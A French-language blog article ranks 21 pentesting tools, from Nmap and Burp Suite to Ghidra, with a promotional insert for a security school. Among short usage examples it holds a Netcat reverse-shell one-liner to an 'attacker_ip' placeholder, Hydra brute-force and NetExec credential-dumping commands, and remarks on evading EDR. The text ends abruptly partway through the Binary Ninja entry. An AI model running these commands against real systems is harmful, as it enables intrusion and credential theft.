Portes ouvertes en ligne : ce Mercredi à 18h

Boite à outils

Top 21 des meilleurs logiciels de hack et de pentesting en 2026

Premier réflexe quand on démarre un test d’intrusion : quels outils utiliser ? La réponse dépend de ce qu’on teste. Réseau, web, mots de passe, exploitation, Active Directory, rétro-ingénierie. Chaque domaine a ses références. Et dans chaque domaine, il y a l’outil que tout le monde cite et celui qu’on utilise vraiment sur le terrain.

Romain Charbonnier
Par Romain Charbonnier
Journaliste indépendant
Contenu mis à jour le
logiciels-hack

Ce classement, c’est le tri que j’ai fait après plusieurs années de pentest. Pas un catalogue d’outils trouvés sur GitHub. Un retour d’expérience, basé sur ce que je lance concrètement quand je suis mandaté pour évaluer la sécurité d’un système. Chaque outil est classé par utilité réelle en conditions opérationnelles. Et pour chacun, vous trouverez ce que les autres articles ne disent pas : les limites, les pièges, et les cas où un outil plus simple fait mieux.

En résumé : Les outils de pentesting incontournables en 2026 sont Nmap (cartographie réseau), Burp Suite (tests web), Metasploit (exploitation), BloodHound et Impacket (Active Directory), Wireshark (analyse réseau), Hashcat (cracking) et Nuclei (scan rapide). La plupart sont gratuits et open source, pré-installés dans Kali Linux.

Tableau comparatif rapide

# Outil Catégorie Gratuit ? Idéal pour Point fort
1 Nmap Reconnaissance réseau Oui (GPL) Premier scan de chaque audit Cartographie réseau en quelques secondes
2 Burp Suite Test web Community gratuit / Pro 475 $/an Pentest d’applications web Interception et modification de requêtes HTTP
3 Metasploit Exploitation Framework gratuit / Pro payant Exploitation de vulnérabilités 2 074+ exploits prêts à l’emploi
4 Wireshark Analyse réseau Oui (GPL) Analyse de trafic Capture et décryptage de paquets en temps réel
5 BloodHound Post-exploitation AD Oui (Apache 2.0) Pentest Active Directory Cartographie des chemins d’escalade de privilèges
6 Impacket Mouvement latéral Oui (Apache 2.0) Post-exploitation Windows Exécution distante sans fichier sur disque
7 Hashcat Cracking mots de passe Oui (MIT) Cracking GPU haute vitesse Jusqu’à des milliards de hash/seconde
8 SQLmap Injection SQL Oui (GPL) Tests d’injection automatisés Détection et exploitation SQL en une commande
9 Nuclei Scan de vulnérabilités Oui (MIT) Scan rapide à large périmètre 9 000+ templates communautaires
10 John the Ripper Cracking mots de passe Oui (GPL) Cracking multi-format Compatible avec 300+ formats de hash
11 Hydra Brute force en ligne Oui (AGPL) Attaques sur protocoles réseau 50+ protocoles supportés (SSH, FTP, HTTP…)
12 Responder Capture d’identifiants Oui (GPL) Pentest interne réseau local Capture passive de hash NTLMv2
13 NetExec Exploitation AD Oui (BSD) Énumération et propagation AD Scan + exploit + dump en une commande
14 Nessus Scan de vulnérabilités Essentials gratuit / Pro payant Audit de conformité 2M+ téléchargements, couverture CVE massive
15 Netcat Utilitaire réseau Oui Transferts, shells, débogage Le couteau suisse du réseau
16 Nikto Scan web Oui (GPL) Scan rapide de serveurs web 7 000+ tests de vulnérabilités serveur
17 Snort IDS/IPS Oui (GPL) Détection d’intrusions réseau Analyse temps réel + règles personnalisables
18 OpenVAS Scan de vulnérabilités Oui (GPL) Alternative open source à Nessus Intégré à la suite Greenbone (GVM)
19 Aircrack-ng Audit Wi-Fi Oui (GPL) Test de sécurité sans fil Cracking WPA/WPA2, support WPA3 en 2026
20 Ghidra Rétro-ingénierie Oui (Apache 2.0) Analyse de binaires/malware Décompilateur multi-architecture gratuit
21 Binary Ninja Rétro-ingénierie Non-commercial gratuit / Pro 299 $ Analyse de malware Interface moderne + API Python

Logo Nmap

1. Nmap, le premier outil de chaque test d’intrusion

Gordon « Fyodor » Lyon · Créé en 1997 · Version 7.98 (août 2025) · GPL

Nmap, c’est la cartographie avant l’attaque. Avant de chercher des failles, il faut savoir ce qui tourne sur le réseau : quels ports sont ouverts, quels services sont actifs, quel OS est en face. Un simple nmap -sV -O 192.168.1.0/24 donne un panorama complet en quelques secondes.

C’est le premier outil que je lance sur quasiment chaque engagement de pentest. Et je ne suis pas le seul. Nmap est pré-installé dans Kali Linux, référencé dans toutes les certifications (OSCP, CEH, CompTIA PenTest+) et utilisé par des millions de professionnels.

La version 7.98 a apporté une avancée concrète : la résolution DNS parallèle. Résoudre un million de noms prend désormais un peu plus d’une heure, contre 49 heures avec les versions précédentes. Sur les tests à large périmètre, ça change la donne. Le Nmap Scripting Engine (NSE) permet aussi d’automatiser des vérifications ciblées : détection de certificats expirés, bannières de services, vulnérabilités connues.

Côté positif
Gratuit, ultra-léger, scriptable, et fiable depuis plus de 25 ans. La communauté est massive et la documentation impeccable.
Le point faible
L’interface graphique Zenmap n’a pas évolué depuis des années. Et Nmap reste un outil de reconnaissance : il détecte, il ne corrige pas. C’est à vous de savoir quoi faire des résultats.
Le socle de toute intervention de pentest. Si vous ne devez maîtriser qu’un seul outil, c’est celui-ci.
Gratuit (GPL)

Logo Burp Suite

2. Burp Suite et le pentest web

PortSwigger · Créé en 2003 · Version 2026.2.3 · Propriétaire

Si vous testez la sécurité d’une application web, Burp Suite est dans votre workflow. C’est un proxy d’interception : il se place entre votre navigateur et le serveur cible, capture chaque requête HTTP/HTTPS et vous permet de la modifier, la rejouer, la disséquer.

L’outil excelle pour les tests manuels. Repeater pour rejouer une requête avec des paramètres modifiés. Intruder pour automatiser des attaques par dictionnaire sur un formulaire de connexion. Scanner pour lancer des vérifications automatiques sur les vulnérabilités OWASP Top 10. Et depuis 2025, Burp AI : un assistant agentique qui aide à explorer les failles détectées, à générer des idées d’attaque et à valider les résultats. Ça ne remplace pas l’expertise du pentester, mais ça accélère le tri.

En version Community, l’outil est utilisable mais limité : le scanner est bridé, l’Intruder est lent. La version Pro (475 $/an) débloque tout. C’est un investissement, mais pour un professionnel qui fait du pentest web au quotidien, c’est rentabilisé en un seul mandat.

Le vrai concurrent à surveiller en 2026 : Caido, un proxy moderne construit en Rust, plus rapide sur les gros volumes de trafic. Il n’a pas encore la maturité de Burp, mais il progresse vite.

Côté positif
Écosystème complet (BApp Store, extensions, Web Security Academy), intégration CI/CD via l’édition DAST, Burp AI pour accélérer l’analyse.
Le point faible
Le prix en version Pro (475 $/an + crédits IA en sus). Et la courbe d’apprentissage est raide pour un débutant : maîtriser Burp prend du temps.
L’outil de référence pour le pentest web. Et avec Burp AI, il vient de prendre une longueur d’avance sur la concurrence.
Community gratuit

Logo Metasploit Framework

3. Metasploit Framework, 2 074 exploits prêts à l’emploi

Rapid7 · Créé en 2003 par H.D. Moore · Version 6.4.123 (mars 2026) · BSD

Metasploit, c’est là où le pentest devient concret. Vous avez identifié une vulnérabilité avec Nmap ou Nessus. Metasploit vous permet de l’exploiter : sélectionner un module d’attaque, configurer un payload (Meterpreter, shell inversé, VNC), lancer l’exploit et prendre le contrôle de la machine cible. Le tout en quelques commandes.

La base de données dépasse les 2 074 exploits en mars 2026. Elle est mise à jour chaque semaine par Rapid7 et la communauté. Les dernières additions couvrent des CVE récentes : Ivanti EPM, BeyondTrust PRA/RS, Ollama (CVE-2024-37032), Grandstream VoIP. C’est cette réactivité qui en fait un outil de référence.

En pratique, Metasploit intervient après la phase de reconnaissance. J’utilise le module db_nmap pour importer directement les résultats de scan, puis je cherche les exploits applicables avec search. L’intégration avec la base de données PostgreSQL permet de gérer plusieurs cibles simultanément, ce qui est pratique sur les audits à large périmètre.

Côté positif
La plus grande base d’exploits publique, des mises à jour hebdomadaires, une communauté très active, et la modularité (payload + exploit = combinaison infinie).
Le point faible
Complexe pour un débutant. L’interface en ligne de commande (msfconsole) demande de l’investissement. Et les exploits publics sont connus des EDR : en conditions réelles, il faut souvent adapter le payload pour contourner la détection.
Si Nmap est le diagnostic, Metasploit est le scalpel. L’outil qui transforme une vulnérabilité théorique en preuve d’exploitation.
Framework gratuit (BSD)

Logo Wireshark

4. Wireshark pour voir ce qui passe sur le réseau

Gerald Combs · Créé en 1998 · Version 4.4.x · GPL

Wireshark capture et décode le trafic réseau en temps réel. Chaque paquet, chaque protocole, chaque échange entre deux machines. C’est l’outil que je sors quand quelque chose ne colle pas sur le réseau : un service qui répond de manière inattendue, un flux chiffré qui ne devrait pas l’être, ou un poste qui communique avec une adresse IP suspecte.

L’outil prend en charge des centaines de protocoles et les mises à jour sont fréquentes. Les filtres d’affichage permettent de cibler exactement ce que vous cherchez (tcp.port == 443 && ip.addr == 10.0.0.5). Sur un pentest réseau, Wireshark complète Nmap : là où Nmap identifie les services, Wireshark montre ce qu’ils font.

En dehors du pentest, Wireshark est aussi utilisé par les administrateurs réseau pour le dépannage. C’est un des rares outils de sécurité qui a une utilité quotidienne même hors contexte offensif.

Côté positif
Gratuit, multi-plateforme, documentation massive, et une profondeur d’analyse que rien n’égale en open source.
Le point faible
L’interface peut intimider. Et sur des captures volumineuses (plusieurs Go), l’outil devient gourmand en mémoire. Pour du monitoring réseau continu, TShark (la version CLI) est plus adapté que l’interface graphique.
L’analyseur réseau de référence. Si un paquet passe sur le réseau, Wireshark le voit.
Gratuit (GPL)

Logo BloodHound

5. BloodHound au cœur du pentest Active Directory

SpecterOps · Créé en 2016 · Version 8.0 (Community Edition) · Apache 2.0

BloodHound, c’est l’outil qui a transformé le pentest Active Directory. Il utilise la théorie des graphes pour cartographier les relations de privilèges dans un domaine : qui peut accéder à quoi, quels chemins mènent au compte Domain Admin, quelles délégations sont mal configurées. En quelques minutes, il rend visible ce qui prendrait des jours à analyser manuellement.

Sur mes interventions de pentest interne, BloodHound est systématique. Je lance SharpHound (le collecteur) sur le réseau, il interroge l’Active Directory et récupère les relations entre utilisateurs, groupes, machines, GPO. Ensuite, BloodHound affiche les chemins d’escalade de privilèges sous forme de graphe. Un clic, et je vois le chemin le plus court entre le compte compromis et le Domain Admin.

La version 8.0 (Community Edition) a introduit OpenGraph, un framework qui étend l’analyse au-delà d’Active Directory : Entra ID (Azure AD), GitHub, Okta. Pour les environnements hybrides (on-premise + cloud), c’est devenu indispensable. SpecterOps propose aussi BloodHound Enterprise (SaaS) pour les blue teams qui veulent surveiller et remédier les chemins d’attaque en continu.

Côté positif
Visualisation des chemins d’attaque AD incomparable, support des environnements hybrides (Azure/Entra ID), communauté très active, gratuit en Community Edition.
Le point faible
SharpHound est détecté par la majorité des antivirus et EDR. En conditions réelles, il faut souvent utiliser des techniques d’évasion pour le lancer. Et l’interprétation des résultats demande une bonne connaissance d’Active Directory.
Si vous faites du pentest interne, BloodHound n’est pas optionnel. C’est l’outil qui transforme un accès utilisateur en chemin vers le Domain Admin.
Community Edition gratuit (Apache 2.0)

Logo Impacket

6. Impacket, le mouvement latéral sans fichier sur disque

Fortra (ex-SecureAuth) · Créé en 1999 · Python · Apache 2.0

Impacket est une collection de scripts Python qui permettent d’interagir avec les protocoles réseau Windows : SMB, MSRPC, LDAP, Kerberos, WMI. En pentest, c’est l’outil de mouvement latéral par excellence. Vous avez des identifiants valides ? Impacket vous donne l’accès distant.

Les scripts les plus utilisés en audit : secretsdump.py pour extraire les hash NTLM d’une machine distante ou d’un contrôleur de domaine (DCSync). wmiexec.py pour exécuter des commandes à distance via WMI, sans écrire de fichier sur le disque. psexec.py pour obtenir un shell distant via le service SMB. GetUserSPNs.py pour le Kerberoasting (extraction de tickets de service à cracker hors ligne avec Hashcat).

Ce qui rend Impacket redoutable, c’est qu’il opère au niveau protocolaire. Pas besoin d’installer un agent sur la cible. Pas de fichier déposé. Les commandes transitent par des protocoles légitimes (SMB, WMI). C’est exactement comme ça qu’un attaquant réel se déplace dans un réseau compromis.

Côté positif
Opère sans écrire sur le disque de la cible, supporte tous les protocoles Windows critiques, scripts spécialisés pour chaque étape du post-exploitation.
Le point faible
L’installation et les dépendances Python peuvent être capricieuses. Et certains scripts (psexec.py) sont maintenant détectés par les EDR modernes. Il faut adapter son approche en fonction du niveau de détection de l’environnement.
L’outil que tout pentester utilise en phase de post-exploitation sur Windows. Avec BloodHound pour la cartographie et Impacket pour l’action, vous couvrez 80 % d’un pentest Active Directory.
Gratuit (Apache 2.0)

Logo Hashcat

7. Hashcat, le cracking à pleine vitesse GPU

Jens « atom » Steube · Version 6.2.6 · MIT

Hashcat est le plus rapide des outils de cracking de mots de passe. Sa force : l’utilisation du GPU. Là où un CPU teste quelques millions de combinaisons par seconde, une carte graphique récente en teste des milliards. Sur un GPU Nvidia RTX 4090, Hashcat atteint 164 milliards de hash MD5 par seconde. Le cracking d’un mot de passe de 8 caractères en NTLM prend quelques minutes.

L’outil supporte plus de 350 algorithmes de hash : MD5, SHA-256, bcrypt, NTLM, WPA/WPA2, Kerberos, et bien d’autres. Les modes d’attaque vont du dictionnaire classique à la combinaison hybride (dictionnaire + règles de mutation), en passant par la force brute pure et les attaques par masque.

En pentest, Hashcat intervient quand je récupère des bases de hash (Active Directory, fichiers /etc/shadow, bases de données compromises). Avec la wordlist rockyou.txt et un jeu de règles bien calibré, je casse régulièrement 60 à 70 % des mots de passe d’un domaine en moins d’une heure. C’est la preuve la plus parlante pour convaincre un client de renforcer sa politique de mots de passe.

Côté positif
Vitesse brute inégalée grâce au GPU, 350+ algorithmes supportés, modes d’attaque variés, et communauté très active.
Le point faible
Nécessite un GPU dédié pour être performant. Sur un simple laptop sans carte graphique, les performances sont médiocres. Et l’interface en ligne de commande n’est pas intuitive pour un débutant.
Le standard pour le cracking de mots de passe. Si vous travaillez en pentest ou en réponse à incident, Hashcat est dans votre boîte à outils.
Gratuit (MIT)

Logo SQLmap

8. SQLmap ou l’injection SQL en une commande

Bernardo Damele A.G. & Miroslav Stampar · Créé en 2006 · GPL

SQLmap fait une chose, et il la fait très bien : détecter et exploiter les failles d’injection SQL. Vous lui donnez une URL avec un paramètre injectable, et il se charge du reste. Détection du type de base de données (MySQL, PostgreSQL, Oracle, MSSQL, SQLite), extraction des tables, dump des données, et dans certains cas, exécution de commandes sur le serveur.

Un sqlmap -u "http://cible.com/page?id=1" --dbs suffit pour lister les bases de données d’un site vulnérable. C’est rapide, c’est automatisé, et c’est redoutablement efficace sur les applications web qui ne filtrent pas correctement les entrées utilisateur.

En audit, SQLmap me sert de vérification rapide après avoir identifié un point d’injection avec Burp Suite. L’outil confirme l’exploitabilité et me donne la preuve technique pour le rapport. C’est un complément, pas un substitut à l’analyse manuelle.

Côté positif
Automatisation complète de la chaîne d’injection SQL, support de 6 types d’injection, et capacité à contourner certains WAF.
Le point faible
Bruyant. SQLmap génère beaucoup de requêtes et peut déclencher les systèmes de détection. Sur un test en conditions furtives, il faut ajuster les paramètres (delay, level, risk) pour éviter de se faire repérer.
L’outil de référence pour les injections SQL. Un must quand vous testez des applications web avec des formulaires de saisie.
Gratuit (GPL)

Le pentesting, ça ne s’improvise pas.

Les outils ne font pas le pentester. C’est la méthodologie, la connaissance des protocoles et la capacité à raisonner comme un attaquant qui font la différence.

Savoir lancer SQLmap est une chose. Comprendre pourquoi une injection SQL est possible et comment y remédier durablement, c’est ce que nos étudiants développent à Guardia, à travers des CTF, des audits en conditions réelles et des projets avec des entreprises partenaires.

Bachelor · MSc · Paris, Lyon, Bordeaux

Découvrir la formation Pentesting →

Logo Nuclei

9. Nuclei, 9 000 templates pour scanner plus vite

ProjectDiscovery · Créé en 2020 · MIT

Nuclei a changé la manière dont on fait du scan de vulnérabilités en pentest. Le concept : des templates YAML, maintenus par une communauté de plus de 5 000 contributeurs, qui décrivent chacun une vérification de sécurité. Vous lancez Nuclei contre une cible, il exécute les templates applicables et produit un rapport. Plus de 9 000 templates sont disponibles : CVE connues, erreurs de configuration, en-têtes de sécurité, fichiers exposés, panels d’administration, technologies détectées.

La vitesse est impressionnante. Nuclei est écrit en Go et exécute des milliers de vérifications en parallèle. Sur un périmètre de 200 sous-domaines, un scan complet prend quelques minutes. Avec Nessus ou OpenVAS, comptez des heures.

En pratique, Nuclei complète les scanners traditionnels. Je l’utilise en début d’intervention pour un balayage large et rapide, avant de concentrer Burp Suite sur les cibles les plus intéressantes. L’intégration avec les autres outils ProjectDiscovery (subfinder pour la découverte de sous-domaines, httpx pour la détection de technologies) crée un pipeline de reconnaissance très efficace.

Côté positif
Ultra-rapide, 9 000+ templates communautaires, écrit en Go, s’intègre dans les pipelines CI/CD, parfait pour le scan à large périmètre.
Le point faible
Les templates communautaires ne sont pas tous de la même qualité. Certains génèrent des faux positifs. Et Nuclei ne remplace pas un scan approfondi avec Burp ou Nessus : il couvre la surface, pas la profondeur.
Le complément idéal aux scanners traditionnels. En 2026, Nuclei est devenu un standard dans les équipes de pentest pour la couverture rapide.
Gratuit (MIT)

Logo John the Ripper

10. John the Ripper, le cracker qui fonctionne partout

Openwall · Créé en 1996 · GPL

John the Ripper, c’est l’outil de cracking qui tourne sur n’importe quelle machine. Moins rapide que Hashcat sur les hash classiques (il ne tire pas parti du GPU de la même façon), mais plus polyvalent sur les formats exotiques. John prend en charge plus de 300 formats de hash, y compris des formats spécifiques que Hashcat ne gère pas : fichiers ZIP protégés, PDF chiffrés, clés SSH, wallets crypto.

La version « Jumbo » (maintenue par la communauté) ajoute des dizaines de formats supplémentaires et des optimisations. C’est la version que tout le monde utilise en pratique.

Sur le terrain, John et Hashcat sont complémentaires. Hashcat pour la vitesse brute sur les gros volumes de hash NTLM ou SHA. John pour les formats spécifiques que Hashcat ne supporte pas. Les deux utilisent les mêmes wordlists et les mêmes règles de mutation.

Côté positif
Polyvalence inégalée sur les formats de hash, fonctionne sur CPU (pas besoin de GPU dédié), version Jumbo très riche.
Le point faible
Plus lent que Hashcat sur les algorithmes courants. L’interface n’a pas évolué : tout se fait en ligne de commande, sans feedback visuel sur la progression.
Le complément naturel de Hashcat. Ensemble, ils couvrent quasiment tous les formats de hash existants.
Gratuit (GPL)

Logo Hydra

11. Hydra et le brute force sur protocoles réseau

The Hacker’s Choice (THC) · GPL

Hydra est un outil de brute force en ligne : il teste des combinaisons identifiant/mot de passe directement sur des services réseau. SSH, FTP, HTTP, RDP, MySQL, SMB, VNC, SMTP. Plus de 50 protocoles sont supportés.

La différence avec Hashcat ou John : Hydra attaque le service en direct, pas un fichier de hash. Ça simule exactement ce qu’un attaquant ferait pour deviner un mot de passe sur un service exposé.

Quand je trouve un service SSH ou RDP exposé sur Internet lors d’un audit, Hydra est l’outil que je lance. Un hydra -l admin -P wordlist.txt ssh://cible suffit pour tester des milliers de combinaisons. Si le mot de passe est faible et qu’il n’y a pas de protection contre le brute force (fail2ban, verrouillage de compte), Hydra le trouvera.

Côté positif
50+ protocoles, parallélisation des attaques, simple d’utilisation.
Le point faible
Lent par nature (chaque tentative passe par le réseau). Et facilement détectable : un pic de connexions échouées déclenche n’importe quel SIEM correctement configuré. C’est un outil de vérification, pas un outil d’attaque furtive.
L’outil de référence pour tester la résistance des services réseau au brute force. Simple, direct, efficace.
Gratuit (AGPL)

Logo Responder

12. Responder, capturer des hash sans faire de bruit

Laurent Gaffié · Python · GPL

Responder exploite un comportement natif de Windows : quand une machine ne trouve pas un nom sur le DNS, elle envoie une requête en broadcast via LLMNR et NBT-NS. Responder intercepte ces requêtes et répond plus vite que le serveur légitime. La machine victime s’authentifie alors auprès de l’attaquant, qui capture le hash NTLMv2.

En pentest interne, Responder est souvent la première action après la prise de pied dans le réseau. Je lance responder -I eth0 et j’attends. En quelques minutes, des hash commencent à arriver. Des postes qui cherchent un partage mal nommé, un serveur d’impression qui n’existe plus, un alias DNS mal configuré. Ces hash sont ensuite passés dans Hashcat pour être crackés, ou relayés directement vers un autre service via ntlmrelayx (un outil d’Impacket).

C’est l’outil qui montre le plus clairement à un client pourquoi les protocoles LLMNR et NBT-NS doivent être désactivés. Le résultat est immédiat et la démonstration est convaincante.

Côté positif
Récupération passive d’identifiants, aucune interaction directe avec les postes, résultats rapides sur la plupart des réseaux d’entreprise.
Le point faible
Ne fonctionne que sur le réseau local (pas en remote). Et si le client a déjà désactivé LLMNR/NBT-NS et activé le SMB signing, Responder ne capturera rien. C’est aussi un bon indicateur de maturité de la sécurité du client.
L’outil de « quick win » par excellence en pentest interne. Si le réseau n’est pas durci, Responder vous donne des identifiants en quelques minutes.
Gratuit (GPL)

Logo NetExec (ex-CrackMapExec)

13. NetExec (ex-CrackMapExec), l’outil AD complet

Communauté open source · BSD

NetExec (anciennement CrackMapExec, renommé après un changement de mainteneur) est un outil d’énumération et d’exploitation Active Directory. Il combine dans une seule interface ce que vous feriez avec 10 scripts Impacket séparés : scan SMB, test d’identifiants sur tout un réseau, dump de LSASS, Kerberoasting, AS-REP Roasting, énumération de partages, exécution de commandes distantes.

La commande qui résume tout : nxc smb 10.0.0.0/24 -u utilisateur -p motdepasse --shares. En une ligne, NetExec teste les identifiants sur toutes les machines du sous-réseau et liste les partages accessibles. Ajoutez --lsa pour extraire les secrets LSA, --sam pour dumper les hash locaux, --bloodhound pour collecter les données BloodHound directement.

Sur le terrain, NetExec me sert dans la phase de propagation. J’ai un premier jeu d’identifiants (récupéré via Responder ou Hashcat), et NetExec me permet de tester rapidement où ces identifiants donnent accès. C’est la boucle : Responder capture, Hashcat cracke, NetExec propage, BloodHound visualise.

Côté positif
Polyvalent (SMB, LDAP, WMI, SSH, MSSQL, RDP), rapide sur les grands réseaux, intégration BloodHound native, communauté active.
Le point faible
Le renommage de CrackMapExec en NetExec a créé de la confusion. La documentation est fragmentée entre les deux noms. Et comme pour Impacket, les actions les plus agressives (dump LSASS) sont détectées par les EDR modernes.
Le complément naturel d’Impacket et BloodHound. Ensemble, ces trois outils couvrent la totalité d’un pentest Active Directory.
Gratuit (BSD)

Logo Nessus

14. Nessus, le scanner de vulnérabilités de référence

Tenable · Créé en 1998 · Propriétaire

Nessus scanne un réseau et produit un rapport détaillé des vulnérabilités détectées : logiciels obsolètes, erreurs de configuration, CVE connues, ports ouverts non sécurisés. C’est l’outil que les équipes sécurité utilisent pour avoir une vision globale de l’exposition d’un système.

La version Essentials est gratuite (16 IP max). La version Professional (environ 3 990 $/an) supprime les limites et ajoute les audits de conformité (PCI DSS, HIPAA, CIS Benchmarks). C’est un outil orienté défensif, mais les pentesters l’utilisent aussi en phase de reconnaissance pour identifier rapidement les cibles les plus vulnérables.

Sur les audits à large périmètre, Nessus me fait gagner du temps. Le scan identifie les machines avec des versions de services vulnérables, et je concentre ensuite mon exploitation sur ces cibles. Le rapport généré est aussi directement utilisable pour le livrable client.

Côté positif
Couverture CVE massive, rapports clairs et exploitables, audits de conformité intégrés.
Le point faible
Le prix de la version Pro. Et la version gratuite (16 IP) est trop limitée pour un usage professionnel. Pour une alternative open source, voir OpenVAS plus bas.
Le standard de l’industrie pour le scan de vulnérabilités. Cher, mais la couverture et la qualité des rapports justifient l’investissement.
Essentials gratuit (16 IP)

L’IA s’installe dans les outils de pentest. Et après ?

Burp AI, PentestGPT, les agents IA qui automatisent la reconnaissance et l’exploitation. Ces technologies reposent sur des modèles qu’il faut comprendre pour les utiliser correctement, et pour anticiper leurs limites.

Les formations en intelligence artificielle de Jedha couvrent ces aspects, du fonctionnement des LLM au déploiement d’agents en production. De quoi prendre de l’avance sur les outils de demain.

Jedha · Intelligence artificielle · 17 campus

Découvrir la formation Cybersécurité Jedha →

Logo Netcat

15. Netcat, le couteau suisse du réseau

Hobbit · Créé en 1995 · GPL

Netcat fait tout et rien à la fois. Transfert de fichiers entre machines, ouverture de shells distants, scan de ports basique, création de tunnels réseau, débogage de services. C’est un outil de bas niveau qui manipule les connexions TCP et UDP brutes.

En pentest, Netcat sert dans les phases de post-exploitation. Vous avez un accès initial sur une machine : Netcat vous permet d’ouvrir un reverse shell vers votre poste d’attaque, de transférer des fichiers, ou de pivoter vers d’autres segments du réseau. Un nc -lvnp 4444 sur votre machine, un nc -e /bin/bash attacker_ip 4444 sur la cible, et vous avez un shell interactif.

La variante Ncat (développée par le projet Nmap) ajoute le support SSL/TLS et les connexions via proxy. C’est la version que j’utilise en priorité.

Côté positif
Minimaliste, présent sur quasiment tous les systèmes Unix, pas de dépendances.
Le point faible
Pas de chiffrement natif (sauf Ncat). Et l’outil n’a pas d’interface : tout se fait en ligne de commande, avec une syntaxe qui demande de la pratique.
L’outil qu’on ne peut pas remplacer. Quand rien d’autre n’est disponible sur une machine compromise, Netcat est souvent déjà installé.
Gratuit (GPL)

Logo Nikto

16. Nikto pour un premier scan de serveur web

CIRT.net · Créé en 2001 · GPL

Nikto scanne un serveur web et identifie les problèmes courants : versions de logiciels obsolètes, fichiers de configuration exposés, en-têtes de sécurité manquants, répertoires par défaut accessibles. L’outil teste plus de 7 000 vérifications et se met à jour régulièrement.

C’est un scan rapide, pas un scan profond. Nikto ne trouvera pas une faille de logique métier ou une injection SQL complexe. En revanche, il repère en quelques minutes les erreurs de configuration que beaucoup de développeurs laissent en production : un dossier /admin accessible, un fichier phpinfo.php oublié, un serveur Apache avec le listing de répertoire activé.

Avant de sortir Burp Suite, je passe souvent Nikto en premier. Ça me donne une vue rapide de la surface d’attaque web.

Côté positif
Rapide, simple, efficace pour les vérifications de base. Codé en Perl, fonctionne partout.
Le point faible
Beaucoup de faux positifs. Et Nikto est bruyant : il envoie des centaines de requêtes en peu de temps. Pas idéal pour un test discret.
Un bon premier scan de serveur web. À compléter systématiquement avec un outil plus avancé comme Burp Suite.
Gratuit (GPL)

Logo Snort

17. Snort, la détection d’intrusions côté défensif

Martin Roesch / Cisco · Créé en 1998 · GPL

Snort surveille le trafic réseau en temps réel et alerte quand il détecte un comportement suspect. C’est un IDS (système de détection d’intrusions) qui peut aussi fonctionner en IPS (prévention). Scans de ports, tentatives de brute force, exploits connus, communications vers des serveurs de commande et contrôle (C2) : Snort détecte tout ça grâce à des règles personnalisables.

En tant que pentester, Snort est l’outil que je vois du côté défensif. C’est ce qui me détecte quand je lance un scan ou un exploit. Connaître Snort et ses règles, c’est aussi savoir comment les contourner. Et c’est ce que nous enseignons à Guardia : comprendre les deux côtés du miroir.

La communauté de règles Snort est massive. Et depuis le rachat par Cisco, Snort 3 a apporté une architecture multithreadée plus performante et une syntaxe de règles simplifiée.

Côté positif
Gratuit, communauté énorme, règles très bien documentées, Snort 3 est un vrai bond en avant.
Le point faible
La configuration initiale demande du temps. Et sur des réseaux à haut débit, Snort peut avoir du mal à suivre sans matériel adapté. Suricata est une alternative performante à considérer.
L’IDS de référence. Que vous soyez en attaque ou en défense, vous devez connaître Snort.
Gratuit (GPL)

Logo OpenVAS

18. OpenVAS, l’alternative open source à Nessus

Greenbone Networks · GPL

Quand Nessus est devenu payant pour les professionnels, OpenVAS a pris le relais. C’est un scanner de vulnérabilités complet, intégré à la suite Greenbone Vulnerability Management (GVM). Il scanne les systèmes, détecte les failles et produit des rapports détaillés.

La couverture est correcte pour un outil gratuit. OpenVAS est mis à jour régulièrement avec de nouvelles signatures de vulnérabilités (NVT). L’installation est plus complexe que Nessus (Docker recommandé), mais une fois configuré, l’outil fait le travail.

Côté positif
Gratuit et open source, intégré à la suite GVM, bonne couverture de vulnérabilités.
Le point faible
L’installation et la configuration sont plus laborieuses que Nessus. Les scans sont aussi plus lents. Et la qualité des rapports est en retrait par rapport à la version payante de Tenable.
Le choix logique si votre budget ne permet pas Nessus Pro. Pour un usage professionnel intensif, Nessus reste supérieur.
Gratuit (GPL)

Logo Aircrack-ng

19. Aircrack-ng et l’audit Wi-Fi

Thomas d’Otreppe · GPL

Aircrack-ng est une suite d’outils pour tester la sécurité des réseaux sans fil. Capture de paquets Wi-Fi, déauthentification de clients, cracking de clés WPA/WPA2, et depuis les mises à jour récentes, support de l’analyse WPA3.

Quand le périmètre d’un test d’intrusion inclut le Wi-Fi de l’entreprise, c’est Aircrack-ng que je sors. Un réseau Wi-Fi mal configuré (WPA2 avec un mot de passe faible, SSID caché mais détectable, absence de 802.1X) représente souvent une porte d’entrée plus facile que l’infrastructure filaire.

L’outil nécessite une carte Wi-Fi compatible avec le mode monitor. C’est une contrainte matérielle à prévoir. Sur Kali Linux, la plupart des cartes Alfa Network fonctionnent nativement.

Côté positif
Suite complète pour l’audit Wi-Fi, support WPA3, fonctionne sur Linux (Kali recommandé).
Le point faible
Nécessite du matériel compatible (carte Wi-Fi mode monitor). Et le cracking WPA2 dépend de la qualité de votre wordlist et de la puissance de votre machine.
L’outil de référence pour l’audit Wi-Fi. Si votre périmètre inclut le sans-fil, Aircrack-ng est incontournable.
Gratuit (GPL)

Logo Ghidra

20. Ghidra, la rétro-ingénierie gratuite par la NSA

NSA · Créé en 2019 (rendu public) · Java · Apache 2.0

Ghidra est un framework de rétro-ingénierie développé par la NSA et rendu open source en 2019. Décompilateur, désassembleur, analyse de binaires multi-architecture (x86, ARM, MIPS, PowerPC…), scripting Java et Python. C’est la réponse gratuite à IDA Pro, qui coûte plusieurs milliers d’euros.

Le décompilateur de Ghidra produit du pseudo-C lisible à partir de binaires compilés. La qualité s’est améliorée à chaque version. Pour l’analyse de malware, le reverse de firmware ou l’audit de binaires IoT, Ghidra fait le travail.

Je place Ghidra avant Binary Ninja dans ce comparatif pour une raison simple : il est gratuit, complet, et la communauté de plugins est en pleine croissance. Binary Ninja a une interface plus fluide et une meilleure réactivité au quotidien. IDA Pro reste la référence dans les équipes spécialisées. Le choix dépend de votre budget et de la fréquence à laquelle vous faites du reverse.

Côté positif
Gratuit et open source, multi-architecture, décompilateur de qualité, scripting Python/Java, communauté en croissance.
Le point faible
L’interface est en Java, ce qui se ressent sur la réactivité (moins fluide que Binary Ninja ou IDA). Et la prise en main initiale demande du temps : Ghidra a beaucoup de fonctionnalités, mais l’ergonomie n’est pas toujours intuitive.
La référence gratuite pour la rétro-ingénierie. Si vous n’avez pas le budget pour IDA Pro, Ghidra est votre premier choix.
Gratuit (Apache 2.0)

Logo Binary Ninja

21. Binary Ninja pour la rétro-ingénierie au quotidien

Vector 35 · Propriétaire

Binary Ninja est une plateforme d’analyse de binaires. Quand vous devez comprendre ce que fait un exécutable sans avoir le code source (analyse de malware, reverse engineering de firmware, audit de logiciel embarqué), c’est l’outil qui rend le travail possible.

